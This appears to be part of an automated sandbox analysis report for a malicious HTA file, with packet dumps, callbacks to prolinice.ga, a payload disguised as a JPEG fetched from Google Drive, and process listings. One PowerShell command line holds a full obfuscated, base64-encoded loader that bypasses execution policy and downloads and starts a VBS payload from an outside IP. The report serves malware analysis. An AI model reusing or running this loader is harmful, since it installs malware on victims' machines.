Oct 23, 2024 08:15:42.991049051 CEST	1236	IN	Data Raw: e6 4a 03 d0 99 7b 04 b0 bd 92 02 09 a0 2f a4 d1 95 3f a8 66 41 38 85 7f 99 76 d6 6a 2e fa 60 6a 44 6b 4a 3b 93 59 86 b6 3a 4b 30 37 5a 8f 11 18 45 17 83 82 91 5f 0d 67 8e 0e f6 92 6e 1d 74 89 12 a1 b7 11 ce 3b 07 ba 3b f6 a7 2d 78 17 73 33 d9 9a Data Ascii: J{/?fA8vj.`jDkJ;Y:K07ZE_gnt;;-xs3~Fw0xXdw^D3~Q-]2(-OmwIKC+<ymmCx>sHXomSf%54m{gxKi.h_TK
Oct 23, 2024 08:15:42.991108894 CEST	424	IN	Data Raw: df 96 5c 23 be 50 e4 5e 32 6a 02 22 0e 57 ad 8a d7 ea 2f 55 6d f8 e1 71 30 d4 c0 d6 b1 5b 56 68 86 db 24 22 14 c7 75 6c 19 5b 7f 01 65 10 03 78 34 13 ae c8 b7 b0 d2 cd 13 3a b1 86 20 cc ba f6 a4 47 81 de 12 c9 42 38 d8 68 d7 83 2c 6c 80 56 56 d0 Data Ascii: \#P^2j"W/Umq0[Vh$"ul[ex4: GB8h,lVV-^C0Z-zdzJL_`e6.g%3Jaoc%]p'P]vm]q6@3\i@Yg>48\|[B\a:M-@+"ko?eQ]*6-
Oct 23, 2024 08:15:42.991153955 CEST	1236	IN	Data Raw: 6e 6d 54 81 f9 01 96 b0 09 28 a6 03 2e d0 c3 6d 13 d9 81 41 46 15 0b ba f9 b3 7e 65 76 92 5d cc 1e ae a9 35 b4 41 50 5c 10 7a 7f 88 38 1a ab bb 21 b9 69 ca 04 6b ff b9 a2 96 71 4a eb 5b 56 13 2c 9e 54 5b 3f 3e 4a 0c d7 79 3b 83 74 21 4f 0a a0 14 Data Ascii: nmT(.mAF~ev]5AP\z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71SmX~io"r~L&\@[KgeK
Oct 23, 2024 08:15:42.991170883 CEST	1236	IN	Data Raw: e5 e9 86 70 da e1 4f 6b 80 17 d7 ab d4 a0 08 24 67 24 e3 fe c2 c7 f6 91 d7 cc 2d 16 83 7e af 9b 2b 47 23 a5 d8 d3 76 93 1d 90 c9 11 a9 a7 7d f7 ab 8c 62 8d c9 7e 36 f4 e0 89 2f 9e df 1f 76 3e 3b ef 65 26 1a ba 08 48 9b fb ba 78 e4 ac 74 0f dc fb Data Ascii: pOk$g$-~+G#v}b~6/v>;e&HxtE8^L4,r2T5n9nD0Sk1%o[;Wch\Zty"n_vULWvNzY&k:_@qfh)[\LMj8Lcyy:_w\|
Oct 23, 2024 08:15:42.991174936 CEST	1236	IN	Data Raw: 8b d7 48 b1 e1 2c 0e b1 00 94 90 28 22 12 5c a6 61 15 23 03 9f 8c 53 9e 5e 78 af 1e 68 82 a5 d0 c5 00 bd e3 6d 58 26 32 0a 21 96 b8 1d 62 20 6b 52 2b 2b c2 aa 0b 00 09 bc 91 31 e1 13 79 7c f5 44 70 e0 24 fb f0 f3 2d a7 02 c9 b9 d0 fc f3 2a 57 99 Data Ascii: H,("\a#S^xhmX&2!b kR++1y\|Dp$-*WThU=C~ovf# _Hy8"(~}K\BBim2q]^]%;Q\)S{n7SGzfy~~>ELv!2mQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49981	45.91.8.152	80	2288	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 08:15:47.711318016 CEST	274	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://prolinice.ga/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 501 Host: prolinice.ga
Oct 23, 2024 08:15:47.711342096 CEST	501	OUT	Data Raw: 6e e2 e1 8b c3 47 f5 12 1a 17 b3 17 3d 2c f9 f3 a5 20 e8 24 45 f8 cc e2 f4 e8 04 6b d8 3b 46 00 35 b9 eb b0 0c ac f4 a2 12 be c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 65 a4 f0 a2 Data Ascii: nG=, $Ek;F5eug]H8.6hEvRY;PLeOc~k_!z1rJC\S7W/x>x :xGresnq~j(vE)\1>mnW69%_Q.,})!s~VD5Ha"
Oct 23, 2024 08:15:48.833766937 CEST	565	IN	HTTP/1.1 404 Not Found date: Wed, 23 Oct 2024 06:15:48 GMT server: Apache/2.4.59 (Debian) content-length: 409 content-type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49772	142.250.186.78	443	6124	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-23 06:14:51 UTC	121	OUT	GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1 Host: drive.google.com Connection: Keep-Alive
2024-10-23 06:14:51 UTC	1319	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 23 Oct 2024 06:14:51 GMT Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-vqur_sv_ZSOBQ9jXi-SRFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49778	142.250.185.193	443	6124	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-23 06:14:52 UTC	139	OUT	GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1 Host: drive.usercontent.google.com Connection: Keep-Alive
2024-10-23 06:14:54 UTC	4884	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="new_image-new.jpg" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 2239109 Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT X-GUploader-UploadID: AHmUCY0C5D7SGfH48jXyZImHlliuC07d8qZsVLM9xTf78fwXFDtnfeQVo0JaD6dCUWAfgzhJK9W3RHa2pA Date: Wed, 23 Oct 2024 06:14:54 GMT Expires: Wed, 23 Oct 2024 06:14:54 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=WqxmdA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-23 06:14:54 UTC	4884	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-10-23 06:14:54 UTC	4884	IN	Data Raw: 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 Data Ascii: +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo\|$vd^b$bmbxq6aB&vQD2~#
2024-10-23 06:14:54 UTC	46	IN	Data Raw: de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 Data Ascii: oVuvH[J}I#k&>$"d)v
2024-10-23 06:14:54 UTC	1323	IN	Data Raw: 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23 78 60 7d b9 6c e9 f5 9a 68 94 d2 18 d9 95 48 45 53 46 d5 6e c9 3c Data Ascii: 96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#x`}lhHESFn<
2024-10-23 06:14:54 UTC	1378	IN	Data Raw: 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4 2b 4a 7a 7d 78 cf 68 ed fb a6 b5 05 45 92 08 be 9c e7 90 d7 c4 9a Data Ascii: E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve+Jz}xhE
2024-10-23 06:14:54 UTC	1378	IN	Data Raw: dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da cc fe 54 1f 66 56 3d cb 1f fb 35 76 ad 81 43 8f fa 67 cc c3 ea a2 Data Ascii: Ol~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)\|jXmsf9 `we!6q{PG\|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(TfV=5vCg
2024-10-23 06:14:54 UTC	1378	IN	Data Raw: bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6 25 a4 34 3b 58 c8 96 22 d1 f4 52 cb c0 ac d4 44 56 45 f2 d8 8f 46 Data Ascii: 1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/%4;X"RDVEF
2024-10-23 06:14:54 UTC	1378	IN	Data Raw: ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6 e7 81 e9 61 d4 45 28 96 23 21 0c 36 fb 0c 0d 48 75 9a 52 a1 69 48 Data Ascii: v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,aE(#!6HuRiH
2024-10-23 06:14:54 UTC	1378	IN	Data Raw: 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d e2 57 0c ea 1e ec 37 22 97 bf 40 0d f6 27 0b aa f1 6d 1f 87 c6 22 Data Ascii: 0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK\|z>8Eq#}W7"@'m"
2024-10-23 06:14:54 UTC	1378	IN	Data Raw: e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5 28 eb 21 60 ea 41 ef b7 a7 eb 93 02 ed 56 70 f2 1f cb fb 64 b9 67 Data Ascii: XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De(!`AVpdg

Target ID:	0
Start time:	02:14:35
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\veryeasythingsevermadeforcreatenewthignsbetterthigns.hta"
Imagebase:	0x7a0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:14:36
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"
Imagebase:	0xcb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:14:36
Start date:	23/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:14:37
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe
Imagebase:	0xcb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:14:41
Start date:	23/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline"
